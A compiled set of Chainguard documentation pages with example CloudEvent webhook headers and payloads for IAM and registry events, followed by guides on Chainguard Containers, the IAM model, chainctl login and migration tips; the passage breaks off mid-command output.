console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/events/v1/subscriptions Ce-Specversion: 1.0 Ce-Subject: UIDP identifier of the subscription to delete Ce-Time: 2025-06-30T21:38:01.787780142Z Ce-Type: dev.chainguard.api.events.subscription.deleted.v1 Content-Length: 119 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP identifier of the subscription to delete" } } Service: iam - GroupAccountAssociations Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/account_associations Ce-Specversion: 1.0 Ce-Subject: UIDP with which this account information is associated Ce-Time: 2025-06-30T21:38:01.786173995Z Ce-Type: dev.chainguard.api.iam.account_associations.created.v1 Content-Length: 385 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "amazon": { "account": "Amazon account ID (if applicable)" }, "description": "description of this association", "google": { "project_id": "Google Cloud Project ID (if applicable)", "project_number": "Google Cloud Project Number (if applicable)" }, "group": "UIDP with which this account information is associated", "name": "group name" } } Method: Update Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/account_associations Ce-Specversion: 1.0 Ce-Subject: UIDP with which this account information is associated Ce-Time: 2025-06-30T21:38:01.786453669Z Ce-Type: dev.chainguard.api.iam.account_associations.updated.v1 Content-Length: 336 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "amazon": { "account": "amazon account if applicable" }, "description": "group description", "google": { "project_id": "project id if applicable", "project_number": "project number if applicable" }, "group": "UIDP with which this account information is associated", "name": "group name" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/account_associations Ce-Specversion: 1.0 Ce-Subject: UIDP of the group whose associations will be deleted Ce-Time: 2025-06-30T21:38:01.786680273Z Ce-Type: dev.chainguard.api.iam.account_associations.deleted.v1 Content-Length: 129 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "group": "UIDP of the group whose associations will be deleted" } } Service: iam - GroupInvites Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/group_invites Ce-Specversion: 1.0 Ce-Subject: group UIDP under which this invite resides Ce-Time: 2025-06-30T21:38:01.780932696Z Ce-Type: dev.chainguard.api.iam.group_invite.created.v1 Content-Length: 145 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "expiration": { "seconds": 100 }, "id": "group UIDP under which this invite resides" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/group_invites Ce-Specversion: 1.0 Ce-Subject: UIDP of the record Ce-Time: 2025-06-30T21:38:01.782156506Z Ce-Type: dev.chainguard.api.iam.group_invite.deleted.v1 Content-Length: 92 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP of the record" } } Service: iam - Groups Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/groups Ce-Specversion: 1.0 Ce-Subject: group UIDP under which this group resides Ce-Time: 2025-06-30T21:38:01.779213057Z Ce-Type: dev.chainguard.api.iam.group.created.v1 Content-Length: 169 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "description": "group description", "id": "group UIDP under which this group resides", "name": "group name" } } Method: Update Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/groups Ce-Specversion: 1.0 Ce-Subject: group UIDP under which this group resides Ce-Time: 2025-06-30T21:38:01.779424994Z Ce-Type: dev.chainguard.api.iam.group.updated.v1 Content-Length: 169 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "description": "group description", "id": "group UIDP under which this group resides", "name": "group name" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/groups Ce-Specversion: 1.0 Ce-Subject: UIDP of the record Ce-Time: 2025-06-30T21:38:01.779578481Z Ce-Type: dev.chainguard.api.iam.group.deleted.v1 Content-Length: 92 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP of the record" } } Service: iam - Identities Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identities Ce-Specversion: 1.0 Ce-Subject: UIDP of identity Ce-Time: 2025-06-30T21:38:01.782561264Z Ce-Type: dev.chainguard.api.iam.identity.created.v1 Content-Length: 329 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "identity": { "Relationship": null, "description": "The human readable description of identity", "id": "The unique identifier of this specific identity", "name": "The human readable name of identity" }, "parent_id": "The Group UIDP path under which the new Identity resides" } } Method: Update Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identities Ce-Specversion: 1.0 Ce-Subject: The unique identifier of this specific identity Ce-Time: 2025-06-30T21:38:01.782828193Z Ce-Type: dev.chainguard.api.iam.identity.updated.v1 Content-Length: 245 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "Relationship": null, "description": "The human readable description of identity", "id": "The unique identifier of this specific identity", "name": "The human readable name of identity" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identities Ce-Specversion: 1.0 Ce-Subject: UIDP of the record Ce-Time: 2025-06-30T21:38:01.783068303Z Ce-Type: dev.chainguard.api.iam.identity.deleted.v1 Content-Length: 92 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP of the record" } } Service: iam - IdentityProviders Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identityProviders Ce-Specversion: 1.0 Ce-Subject: UIDP of identity provider Ce-Time: 2025-06-30T21:38:01.779759309Z Ce-Type: dev.chainguard.api.iam.identity_providers.created.v1 Content-Length: 378 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "identity_provider": { "Configuration": null, "description": "The human readable description of identity provider", "id": "The UIDP of the IAM group to nest this identity provider under", "name": "The human readable name of identity provider" }, "parent_id": "The UIDP of the IAM group to nest this identity provider under" } } Method: Update Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identityProviders Ce-Specversion: 1.0 Ce-Subject: The UIDP of the IAM group to nest this identity provider under Ce-Time: 2025-06-30T21:38:01.779944686Z Ce-Type: dev.chainguard.api.iam.identity_providers.updated.v1 Content-Length: 279 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "Configuration": null, "description": "The human readable description of identity provider", "id": "The UIDP of the IAM group to nest this identity provider under", "name": "The human readable name of identity provider" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identityProviders Ce-Specversion: 1.0 Ce-Subject: UIDP of the IdP Ce-Time: 2025-06-30T21:38:01.780117169Z Ce-Type: dev.chainguard.api.iam.identity_providers.deleted.v1 Content-Length: 89 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP of the IdP" } } Service: iam - RoleBindings Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/rolebindings Ce-Specversion: 1.0 Ce-Subject: UIDP of the Role to bind Ce-Time: 2025-06-30T21:38:01.786949717Z Ce-Type: dev.chainguard.api.iam.rolebindings.created.v1 Content-Length: 261 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "parent": "The Group UIDP path under which the new RoleBinding resides", "role_binding": { "id": "UID of this role binding", "identity": "UID of the Identity to bind", "role": "UIDP of the Role to bind" } } } Method: Update Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/rolebindings Ce-Specversion: 1.0 Ce-Subject: UID of this role binding Ce-Time: 2025-06-30T21:38:01.787137549Z Ce-Type: dev.chainguard.api.iam.rolebindings.updated.v1 Content-Length: 173 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UID of this role binding", "identity": "UID of the Identity to bind", "role": "UIDP of the Role to bind" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/rolebindings Ce-Specversion: 1.0 Ce-Subject: UID of the record Ce-Time: 2025-06-30T21:38:01.787330219Z Ce-Type: dev.chainguard.api.iam.rolebindings.deleted.v1 Content-Length: 91 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UID of the record" } } Service: registry - Registry Method: CreateRepo Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/registry/v1/repos Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific repository Ce-Time: 2025-06-30T21:38:01.783539004Z Ce-Type: dev.chainguard.api.platform.registry.repo.created.v1 Content-Length: 243 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "The identifier of this specific repository", "name": "The name is the human-readable name of the repository", "sync_config": { "expiration": {}, "source": "Repo ID to sync from" } } } Method: UpdateRepo Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/registry/v1/repos Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific repository Ce-Time: 2025-06-30T21:38:01.78388445Z Ce-Type: dev.chainguard.api.platform.registry.repo.updated.v1 Content-Length: 243 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "The identifier of this specific repository", "name": "The name is the human-readable name of the repository", "sync_config": { "expiration": {}, "source": "Repo ID to sync from" } } } Method: DeleteRepo Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/registry/v1/repos Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific repository Ce-Time: 2025-06-30T21:38:01.784116194Z Ce-Type: dev.chainguard.api.platform.registry.repo.deleted.v1 Content-Length: 116 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "The identifier of this specific repository" } } Method: CreateTag Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/registry/v1/tags Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific tag Ce-Time: 2025-06-30T21:38:01.785252862Z Ce-Type: dev.chainguard.api.platform.registry.tag.created.v1 Content-Length: 197 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "digest": "The digest of the manifest with this tag", "id": "The identifier of this specific tag", "name": "The unique name of the tag" } } Method: UpdateTag Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/registry/v1/tags Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific tag Ce-Time: 2025-06-30T21:38:01.785576657Z Ce-Type: dev.chainguard.api.platform.registry.tag.updated.v1 Content-Length: 197 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "digest": "The digest of the manifest with this tag", "id": "The identifier of this specific tag", "name": "The unique name of the tag" } } Method: DeleteTag Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/registry/v1/tags Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific tag Ce-Time: 2025-06-30T21:38:01.785806818Z Ce-Type: dev.chainguard.api.platform.registry.tag.deleted.v1 Content-Length: 109 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "The identifier of this specific tag" } } --- ### Overview of Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/overview/ Last Modified: May 27, 2025 Tags: Chainguard Containers, Product Chainguard Containers are a collection of container images designed for security and minimalism. Many Chainguard Containers are distroless; they contain only an open-source application and its runtime dependencies. These images do not even contain a shell or package manager, and are often paired with an equivalent development variant (sometimes referred to as a dev variant) that allows further customization, for build and debug purposes. Chainguard Containers are built with Chainguard OS, designed from the ground up to produce container images that meet the requirements of a secure software supply chain. The main features of Chainguard Containers include: Minimal design, with no unnecessary software bloat Automated nightly builds to ensure container images are completely up-to-date and contain all available security patches High quality build-time SBOMs (software bill of materials) attesting the provenance of all artifacts within the container image Verifiable signatures provided by Sigstore Reproducible builds with Cosign and apko (read more about reproducibility) Chainguard Containers are primarily available from Chainguard’s registry, but a selection of developer images is also available on Docker Hub. You can find the complete list of available Chainguard Containers in our public Containers Directory or within the Chainguard Console. Why Minimal Container Images The fewer dependencies a given piece of software uses, the lower likelihood that it will be impacted by CVEs. By minimizing the number of dependencies and thus reducing their potential attack surface, Chainguard Containers inherently contain few to zero CVEs. Chainguard Containers are rebuilt nightly to ensure they are completely up-to-date and contain all available security patches. With this nightly build approach, our engineering team sometimes fixes vulnerabilities before they’re detected. Note that there is often a development variant of each Chainguard Container available. These are sometimes called the -dev variant, as their tags include the -dev suffix (as in :latest-dev). For example, the development variant of the mariadb:latest container image is mariadb:latest-dev. These container images typically contain a shell and tools like a package manager to allow users to more easily debug and modify the image. Why Multi-Layer Container Images Chainguard originally took a single-layer approach to container images built with apko in order to offer simplicity and clarity. However, in an effort to deliver better stability, security, and efficiency for larger and more complex applications, Chainguard introduced multi-layer container images in May 2025. This approach leverages container runtime caching so that a layer used by multiple images does not need to be downloaded more than once, and you don’t need to download the whole image each time there is an update on one layer. Chainguard’s approach to layering is a “per-origin” strategy, where packages that derive from the same upstream source are grouped in the same layer because they tend to receive updates together. We observed that this approach achieved the following: A ~70% reduction in the total size of unique layer data across our image catalog compared to the single-layer approach A 70-85% reduction in the cumulative bytes transferred when simulating sequential pulls of updated images like PyTorch and NeMo To maximize the stability and re-useability of our layers, Chainugard identified, analyzed, and implemented three additional technical changes: Added in an additional final layer that captures frequently updated OS-level metadata Developed intelligent layer ordering to optimize compatibility Ensured sufficient layer counts to optimize parallel downloads by container clients The primary benefit of this layered approach is that when one package changes it impacts only its particular layer, requiring only that layer to be downloaded again. Because the other layers don’t need to be downloaded again, Chainguard’s multi-layer container images support greater efficiency and developer velocity. Production and Starter Containers Chainguard offers a collection of container images that are publicly available and don’t require authentication, being free to use by anyone. We refer to these images as Starter containers, and they cover several use cases for different language ecosystems. Starter images are limited to the latest build of a given image, tagged as latest and latest-dev. Production containers are enterprise-ready images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness and unique time stamped tags. Unlike Starter containers, which are typically paired with only the latest version of an upstream package, Production containers offer specific major and minor versions of open source software. You can access our container images directly from Chainguard’s registry. Chainguard’s registry provides public access to all public Chainguard Containers, and provides customer access for Production Containers after logging in and authenticating. For a complete list of Starter containers that are currently available, check our Containers Directory. Registered users can also access all Starter and Production containers in the Chainguard Console. After logging in you will be able to find all the current Starter containers in the Public containers tab. If you’ve selected an appropriate Organization in the drop-down menu above the left hand navigation, you can find your organization’s Production containers in the Organization images tab. Comparing Container Images The following graph shows a comparison between the official Nginx image and Chainguard’s Nginx container image, based on the number of CVEs (common vulnerabilities and exposures) detected by Grype: Nginx Comparing the latest official Nginx image with cgr.dev/chainguard/nginx The major advantage of distroless images is the reduced size and complexity, which results in a vastly reduced attack surface. This is evidenced by the results from security scanners, which detect far fewer potential vulnerabilities in Chainguard Containers. You can review more comparisons of Chainguard Containers and external images by checking out our Vulnerability Comparisons dashboard. chainctl, Chainguard’s command line interface tool, comes with a useful diff feature that also allows you to compare two Chainguard Containers. Architecture By default, all Wolfi-based images are built for x86_64 (also known as AMD64) and AArch64 (also known as ARM64) architectures. Being able to provide multi-platform Chainguard Containers enables the support of more than one runtime environment, like those available on all three major clouds, AWS, GCP, and Azure. The macOS M1 and M2 chips are also based on ARM architecture. Chainguard Containers allow you to take advantage of ARM’s power consumption and cost benefits. You can confirm the available architecture of a given Chainguard Container with Crane. In this example, we’ll use the latest Ruby image, but you can opt to use an alternate image. crane manifest cgr.dev/chainguard/ruby:latest |jq -r '.manifests []| .platform' Once you run this command, you’ll receive output similar to the following. { "architecture": "amd64", "os": "linux" } { "architecture": "arm64", "os": "linux" } This verifies that the Ruby Chainguard Container is built for both AMD64 and ARM64 architectures. You can read more about our support of ARM64 in our blog on Building Wolfi from the ground up. --- ### How to Use Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/how-to-use-chainguard-images/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product Chainguard Containers are based on Wolfi, our Linux undistro designed specifically for containers. Wolfi uses the apk package format, which contributes in making packages smaller and more accountable, resulting in smaller images with traceable provenance information based on cryptographic signatures. In this guide, you’ll find general instructions on how to get started using Chainguard Containers and how to migrate existing container-based workflows to use our images. For specific image usage instructions, please refer to our Chainguard Containers Directory, which contains the full list of all images available to the public and their respective documentation. Quickstart: Using Chainguard Containers To get up and running with Chainguard Containers, you can use docker commands to pull and run images. For each specific image, you’ll find this guidance on its overview page (for example, see Node, Python, or NGINX). Pulling a Chainguard Container You can pull a Chainguard Container with the docker pull command. For example, to pull down the Git Chainguard Container, you can run the following. docker pull cgr.dev/chainguard/git Without passing a tag or a digest, the reference to the Git image will pull down the default tag, which is :latest. If you have your own registry, you’ll need to change the cgr.dev/chainguard path to your own registry path. Chainguard free Starter container images are also available on Docker Hub. Check out Chainguard’s organization page on Docker Hub for a list of all images and instructions. Note that paid Production images can only be accessed from cgr.dev. Pulling by Tag You can also add a relevant tag that you have access to. In the case of the public Git image, you can always pull the :latest tag. Note that not all tags are available for public container images. docker pull cgr.dev/chainguard/git:latest You may use tags to pull a specific version of a software like Git, or programming language version in a catalog you have access to. The Chainguard Containers Directory has tag history pages for each image, for example, the Git Image Tags History, PHP Image Tags History, and JDK Image Tags History. You can learn about the Chainguard Containers tags history in our guide about Using the Tag History API. Pulling by Digest Pulling a Chainguard Container by its digest guarantees reproducibility, as it will ensure that you are using the same image each time (versus the tag that may receive updates). To pull an image by its digest, you can do so by appending the digest which begins with sha256.docker pull cgr.dev/chainguard/git@sha256:f6658e10edde332c6f1dc804f0f664676dc40db78ba4009071fea6b9d97d592f When you pull this image, you’ll receive output of the digest which should match the exact digest you have pulled. To learn more about image digests, you can review our video How to Use Container Image Digests to Improve Reproducibility. Specifying Architecture As Chainguard Containers are built for both AMD64 and ARM64 architecture, you can specify the architecture you would like to use by employing the --platform flag with the docker pull command. In this example, we’ll specify using the linux/arm64 architecture with the Go image. docker pull --platform=linux/arm64 cgr.dev/chainguard/go After pulling the image, you can verify the architecture by calling the version. docker run --rm -t cgr.dev/chainguard/go:latest version You’ll receive output similar to the following: go version go1.21.0 linux/arm64 Specifying the platform will ensure that you’re using the desired container image and relevant architecture. Running a Chainguard Container You can run a Chainguard Container with the docker run command. Note that because Chainguard Containers are minimalist containers, most of them ship without a shell or package manager. If you would like a shell, you can often use the development image, which is tagged as :latest-dev. For example, Python has its development variant at cgr.dev/chainguard/python:latest-dev. Otherwise, you can work with Chainguard Containers in way similar to other images. Let’s run the Cosign Chainguard Container to check its version. docker run --rm -t cgr.dev/chainguard/cosign:latest version You’ll receive the version information that confirms the image is working as expected. ______ ______ _______. __ _______ .__ __. / | / __ \ / || | / _____|| \ | | | ,----'| | | | | (----`| | | | __ | \| | | | | | | | \ \ | | | | |_ | | . ` | | `----.| `--' | .----) | | | | |__| | | |\ | \______| \______/ |_______/ |__| \______| |__| \__| cosign: A tool for Container Signing, Verification and Storage in an OCI registry. GitVersion: 2.0.0 GitCommit: unknown GitTreeState: unknown BuildDate: unknown GoVersion: go1.20.1 Compiler: gc Platform: linux/arm64 If you would like to review a filesystem, you can use the wolfi-base image: docker run -it cgr.dev/chainguard/wolfi-base This will start a Wolfi container where you can explore the file system and investigate which packages are available. Continue reading the next section to learn more about building off of the Wolfi base image. Extending Chainguard Base Containers It often happens that you want a distroless image with one or two extra packages, for example you may have a binary with a dependency on curl or git. Ideally you’d like a base image with this dependency already installed. There are a few options here: Compile the dependency from source and use a multi-stage Dockerfile to create a new base image. This works, but may require considerable effort to get the dependency compiling and to keep it up to date. This process quickly becomes untenable if you require several dependencies. Use the wolfi-base image that includes apk tools to install the package in the traditional Dockerfile manner. This works but sacrifices a lot of the advantages of the “distroless” philosophy. Use Chainguard’s melange and apko tooling to create a custom base image. This keeps the image as minimal as possible without sacrificing maintainability. Using the wolfi-base container image The wolfi-base image is a good starting point to try out Chainguard Containers. Unlike most of the other images, which are strictly distroless, wolfi-base includes the apk package manager, which facilitates composing additional software into it. Just keep in mind that the resulting image will be a little larger due to the extra software and won’t have a comprehensive SBOM that covers all your dependencies, since the new software will be added as a layer on top of wolfi-base. The following command will pull the wolfi-base image to your local system and run an interactive shell that you can use to explore the image features: docker run -it --rm cgr.dev/chainguard/wolfi-base /bin/sh -l First you will need to update the list of packages available in Wolfi: apk update Now you can use apk search to search for packages that are already available on Wolfi repositories: apk search curl More packages will be added with time, as the ecosystem matures and drives community involvement. Looking for a specific package that is not yet available? Feel free to open an issue on the wolfi-os GitHub repository. Using the wolfi-base container image within Dockerfiles Following, you can see an example of a Dockerfile that uses wolfi-base as base image, installing the packages curl and jq in order to make a query to the advice slip API: FROMcgr.dev/chainguard/wolfi-baseRUN apk update && apk add --no-cache --update-cache curl jqSHELL ["/bin/sh", "-c"]CMD curl -s https://api.adviceslip.com/advice --http1.1 | jq .slip.adviceThe SHELL command suppresses a warning about the CMD line using shell syntax, which isn’t a problem in this example. In other cases, you may want to use the exec form. You can build this Dockerfile as usual: docker build . -t advice-slip:test Then, execute the image with: docker run -it --rm advice-slip:test You should get output like this, with a random piece of advice: "Big things have small beginnings." Check also the Wolfi Images with Dockerfiles guide for more examples using Wolfi-based images with Dockerfiles, and the Getting Started with Distroless guide for more details about distroless images and how to use them in Docker multi-stage builds. A Note regarding package availability in Chainguard Containers Chainguard Containers only contain packages that come from the Wolfi Project or those that are built and maintained internally by Chainguard. Starting in March of 2024, Chainguard will maintain one version of each Wolfi package at a time. These will track the latest version of the upstream software in the package. Chainguard will end patch support for previous versions of packages in Wolfi. Existing packages will not be removed from Wolfi and you may continue to use them, but be aware that older packages will no longer be updated and will accrue vulnerabilities over time. The tools we use to build packages and images remain freely available and open source in Wolfi. This change ensures that Chainguard can provide the most up-to-date patches to all packages for our container images customers. Note that specific package versions can be made available in Production images. If you have a request for a specific package version, please contact us. --- ### Overview of the Chainguard IAM Model URL: https://edu.chainguard.dev/chainguard/administration/iam-organizations/overview-of-chainguard-iam-model/ Last Modified: April 3, 2024 Tags: Product, Reference Chainguard provides a rich Identity and Access Management (IAM) model similar to those used by AWS and GCP. Once authenticated, you can set up a desired structure for managing and delegating Chainguard assets. Organizations and Folders Chainguard’s IAM model consists of two structures: Organizations and Folders. An organization is a customer or group of customers working with the same Chainguard resources, while a folder is a collection of resources within a Chainguard organization. Organizations have a unique domain as their identifier and a user can belong to more than one organization. It’s possible for organizations to become verified organizations. Verification modifies some aspects of the Chainguard platform user experience to help large organizations guide their user base to the correct resource. This optional process is performed manually by Chainguard, so if you’re interested in verifying your organization, please reach out to your customer support contact. Identities In the context of Chainguard, an identity represents an individual user within an organization. Users typically join an organization after being sent an invitation. After receiving an invitation, the user can sign up with a Google, GitHub, or Gitlab account. In cases like this, the user’s identity is the email address associated with the account they used to log in. Note: If their organization has configured one, a user can sign up with a custom identity provider. In order to create an invitation for a new user, you must choose a role for that user and then create a role-binding to tie that user to the chosen role. Our overview of roles and role-bindings has more information. You can also create assumable identities. These are typically used to allow automation tools like GitHub Actions or Amazon Lambda to connect to and manage Chainguard resources. Refer to our guide on assumable identities to learn more. Logging in to the Chainguard Platform To authenticate into the Chainguard platform, run the following login command. chainctl auth login A web browser window will open to prompt you to log in via your chosen OIDC flow. Select the account which you wish to log in as, and you can then begin managing your Chainguard resources. Using the headless login flow Note that you can also use chainctl’s --headless option to log in. This option allows you to log in to the Chainguard platform from a device that doesn’t have a browser installed, such as a container or remote server. The headless login flow is when you invoke chainctl auth login --headless in the terminal. chainctl auth login --headless By including this option, chainctl will output an eight-character code as well as a URL (https://auth.chainguard.dev/activate). You can then navigate to the URL on another device’s browser and enter the code, and then you can complete the login process to Chainguard from that device. Be aware that the --headless login code will only be valid for 900 seconds. --- ### Tips for Migrating to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-tips/ Last Modified: May 29, 2025 Tags: Chainguard Containers, Product The process of migrating over to Chainguard Containers isn’t always straightforward. To help customers become acquainted with Chainguard Containers as they go through the migration process, we’ve assembled this list of tips and strategies for migrating over their applications. Use Development Variants When You Need a Shell Chainguard provides development (or -dev) variants of its containers which include a shell and package manager to allow users to more easily debug and modify the image. To illustrate, if you try to get a shell in the cgr.dev/chainguard/nginx:latest image it will return an error: docker run -it --entrypoint /bin/sh --user root cgr.dev/chainguard/nginx:latest docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: exec: "/bin/sh": stat /bin/sh: no such file or directory: unknown. But this is possible with the latest-dev variant: docker run -it --entrypoint /bin/sh --user root cgr.dev/chainguard/nginx:latest-dev / # apk add php fetch https://packages.wolfi.dev/os/aarch64/APKINDEX.tar.gz (1/6) Installing xz (5.4.6-r0) (2/6) Installing 